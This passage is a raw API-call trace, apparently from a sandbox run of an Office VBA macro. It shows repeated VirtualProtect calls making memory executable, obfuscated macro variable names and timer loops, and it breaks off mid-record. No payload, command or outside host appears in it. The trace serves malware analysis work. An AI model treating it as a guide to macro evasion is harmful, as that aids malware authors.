lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.471] GetCurrentProcess () returned 0xffffffff [0111.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0111.471] GetCurrentProcess () returned 0xffffffff [0111.471] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0111.471] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.472] GetCurrentProcess () returned 0xffffffff [0111.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0111.472] GetCurrentProcess () returned 0xffffffff [0111.472] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0111.472] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.473] GetCurrentProcess () returned 0xffffffff [0111.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0111.473] GetCurrentProcess () returned 0xffffffff [0111.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0111.473] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.473] GetCurrentProcess () returned 0xffffffff [0111.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0111.473] GetCurrentProcess () returned 0xffffffff [0111.473] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0111.474] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.474] GetCurrentProcess () returned 0xffffffff [0111.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0111.474] GetCurrentProcess () returned 0xffffffff [0111.474] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0111.474] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.475] GetCurrentProcess () returned 0xffffffff [0111.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0111.475] GetCurrentProcess () returned 0xffffffff [0111.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0111.475] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.475] GetCurrentProcess () returned 0xffffffff [0111.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0111.475] GetCurrentProcess () returned 0xffffffff [0111.475] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0111.475] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.476] GetCurrentProcess () returned 0xffffffff [0111.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0111.476] GetCurrentProcess () returned 0xffffffff [0111.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0111.476] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.476] GetCurrentProcess () returned 0xffffffff [0111.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0111.476] GetCurrentProcess () returned 0xffffffff [0111.476] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0111.476] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0111.477] GetCurrentProcess () returned 0xffffffff [0111.477] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0111.477] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.477] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0111.477] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x69130000 [0111.478] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.478] GetProcAddress (hModule=0x69130000, lpProcName=0x256) returned 0x691374be [0111.479] GetAsyncKeyState (vKey=3) returned 0 [0111.479] CRetailMalloc_Alloc () returned 0xca3d758 [0111.479] memcpy (in: _Dst=0xcb65188, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.480] memcpy (in: _Dst=0xcb65290, _Src=0x1977e4, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0111.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432fd2, cbMultiByte=6, lpWideCharStr=0x1975e4, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0111.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0a9e, cbMultiByte=6, lpWideCharStr=0x197644, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0111.481] memcpy (in: _Dst=0xcb65188, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.481] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="\x97\x96\x96\x96\x96\x96\x97", cchCount2=-1) returned 1 [0111.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432ff6, cbMultiByte=8, lpWideCharStr=0x1975e4, cchWideChar=9 | out: lpWideCharStr="—–––––—") returned 8 [0111.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0a7a, cbMultiByte=8, lpWideCharStr=0x197644, cchWideChar=9 | out: lpWideCharStr="—–––––—") returned 8 [0111.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0a7a, cbMultiByte=8, lpWideCharStr=0x197644, cchWideChar=9 | out: lpWideCharStr="—–––––—") returned 8 [0111.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0a7a, cbMultiByte=8, lpWideCharStr=0x197644, cchWideChar=9 | out: lpWideCharStr="—–––––—") returned 8 [0111.482] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x97\x97", cchCount1=-1, lpString2="\x97\x96\x96\x96\x96\x96\x97", cchCount2=-1) returned 1 [0111.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0a7a, cbMultiByte=8, lpWideCharStr=0x197644, cchWideChar=9 | out: lpWideCharStr="—–––––—") returned 8 [0111.482] CRetailMalloc_Alloc () returned 0xf616648 [0111.482] _mbscpy_s (in: _Dst=0xf616648, _DstSizeInBytes=0x8, _Src=0x112b0a7a | out: _Dst=0xf616648) returned 0x0 [0111.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0d62, cbMultiByte=15, lpWideCharStr=0x197654, cchWideChar=16 | out: lpWideCharStr="_B_var_—–––––—") returned 15 [0111.483] _mbscpy_s (in: _Dst=0x1976bc, _DstSizeInBytes=0x8, _Src=0x112b0a7a | out: _Dst=0x1976bc) returned 0x0 [0111.483] CRetailMalloc_Free () returned 0x1 [0111.483] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0111.483] memcpy (in: _Dst=0xcb65188, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.483] memcpy (in: _Dst=0xcb65188, _Src=0x197634, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.483] memcpy (in: _Dst=0xcb65188, _Src=0x197634, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.483] memcpy (in: _Dst=0xcb65188, _Src=0x197634, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.483] memcpy (in: _Dst=0xcb65188, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.483] memcpy (in: _Dst=0xcb65188, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0111.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6936ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0111.483] memcpy (in: _Dst=0xca3d7cc, _Src=0x197864, _Size=0x18 | out: _Dst=0xca3d7cc) returned 0xca3d7cc [0111.483] CRetailMalloc_Realloc () returned 0xca3d758 [0111.483] CRetailMalloc_Free () returned 0x1 [0111.484] GetCurrentProcess () returned 0xffffffff [0111.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0111.484] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.484] GetCurrentProcess () returned 0xffffffff [0111.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0111.484] GetCurrentProcess () returned 0xffffffff [0111.484] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0111.484] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.485] GetCurrentProcess () returned 0xffffffff [0111.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0111.485] GetCurrentProcess () returned 0xffffffff [0111.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0111.485] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.485] GetCurrentProcess () returned 0xffffffff [0111.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0111.485] GetCurrentProcess () returned 0xffffffff [0111.485] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0111.486] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.486] GetCurrentProcess () returned 0xffffffff [0111.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0111.486] GetCurrentProcess () returned 0xffffffff [0111.486] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0111.486] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.487] GetCurrentProcess () returned 0xffffffff [0111.487] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0111.487] GetCurrentProcess () returned 0xffffffff [0111.487] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0111.487] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.488] GetCurrentProcess () returned 0xffffffff [0111.488] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0111.488] GetCurrentProcess () returned 0xffffffff [0111.488] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0111.488] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.489] GetCurrentProcess () returned 0xffffffff [0111.489] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0111.489] GetCurrentProcess () returned 0xffffffff [0111.489] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0111.489] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.489] GetCurrentProcess () returned 0xffffffff [0111.490] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0111.490] GetCurrentProcess () returned 0xffffffff [0111.490] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0111.490] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.490] GetCurrentProcess () returned 0xffffffff [0111.490] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0111.490] GetCurrentProcess () returned 0xffffffff [0111.490] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0111.490] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.491] GetCurrentProcess () returned 0xffffffff [0111.491] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0111.491] GetCurrentProcess () returned 0xffffffff [0111.491] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0111.491] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.491] GetCurrentProcess () returned 0xffffffff [0111.492] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0111.492] GetCurrentProcess () returned 0xffffffff [0111.492] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0111.492] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.492] GetCurrentProcess () returned 0xffffffff [0111.492] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0111.492] GetCurrentProcess () returned 0xffffffff [0111.492] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0111.492] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.493] GetCurrentProcess () returned 0xffffffff [0111.493] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0111.493] GetCurrentProcess () returned 0xffffffff [0111.493] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0111.493] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.494] GetCurrentProcess () returned 0xffffffff [0111.494] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0111.494] GetCurrentProcess () returned 0xffffffff [0111.494] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0111.494] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.495] GetCurrentProcess () returned 0xffffffff [0111.495] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0111.495] GetCurrentProcess () returned 0xffffffff [0111.495] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0111.495] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.495] GetCurrentProcess () returned 0xffffffff [0111.495] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0111.495] GetCurrentProcess () returned 0xffffffff [0111.496] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0111.496] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.496] GetCurrentProcess () returned 0xffffffff [0111.496] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0111.496] GetCurrentProcess () returned 0xffffffff [0111.496] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0111.496] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.497] GetCurrentProcess () returned 0xffffffff [0111.497] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0111.497] GetCurrentProcess () returned 0xffffffff [0111.497] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0111.497] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.498] GetCurrentProcess () returned 0xffffffff [0111.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0111.498] GetCurrentProcess () returned 0xffffffff [0111.498] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0111.498] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.499] GetCurrentProcess () returned 0xffffffff [0111.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0111.499] GetCurrentProcess () returned 0xffffffff [0111.499] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0111.499] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.500] GetCurrentProcess () returned 0xffffffff [0111.500] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0111.500] GetCurrentProcess () returned 0xffffffff [0111.500] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0111.500] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.500] GetCurrentProcess () returned 0xffffffff [0111.500] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0111.501] GetCurrentProcess () returned 0xffffffff [0111.501] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0111.501] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.501] GetCurrentProcess () returned 0xffffffff [0111.501] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0111.501] GetCurrentProcess () returned 0xffffffff [0111.501] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0111.501] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.502] GetCurrentProcess () returned 0xffffffff [0111.502] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0111.502] GetCurrentProcess () returned 0xffffffff [0111.502] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0111.502] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.507] GetCurrentProcess () returned 0xffffffff [0111.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0111.507] GetCurrentProcess () returned 0xffffffff [0111.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0111.507] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.508] GetCurrentProcess () returned 0xffffffff [0111.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0111.508] GetCurrentProcess () returned 0xffffffff [0111.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0111.508] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.509] GetCurrentProcess () returned 0xffffffff [0111.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0111.509] GetCurrentProcess () returned 0xffffffff [0111.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0111.509] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.510] GetCurrentProcess () returned 0xffffffff [0111.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0111.510] GetCurrentProcess () returned 0xffffffff [0111.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0111.510] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.511] GetCurrentProcess () returned 0xffffffff [0111.511] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0111.511] GetCurrentProcess () returned 0xffffffff [0111.511] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0111.511] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.511] GetCurrentProcess () returned 0xffffffff [0111.511] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0111.512] GetCurrentProcess () returned 0xffffffff [0111.512] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0111.512] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0111.512] GetCurrentProcess () returned 0xffffffff [0111.512] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0111.512] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.512] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0111.513] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x69130000 [0111.513] SetErrorMode (uMode=0x8001) returned 0x8001 [0111.514] GetProcAddress (hModule=0x69130000, lpProcName=0x217) returned 0x6913741e [0111.515] GetAsyncKeyState (vKey=3) returned 0 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.515] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0111.515] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x12, wMinute=0x23, wSecond=0x34, wMilliseconds=0x2cd)) [0111.516] VarAdd (in: pvarLeft=0x197ef0, pvarRight=0x197ee0, pvarResult=0x197ed0 | out: pvarResult=0x197ed0) returned 0x0 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0111.516] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0111.516] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, 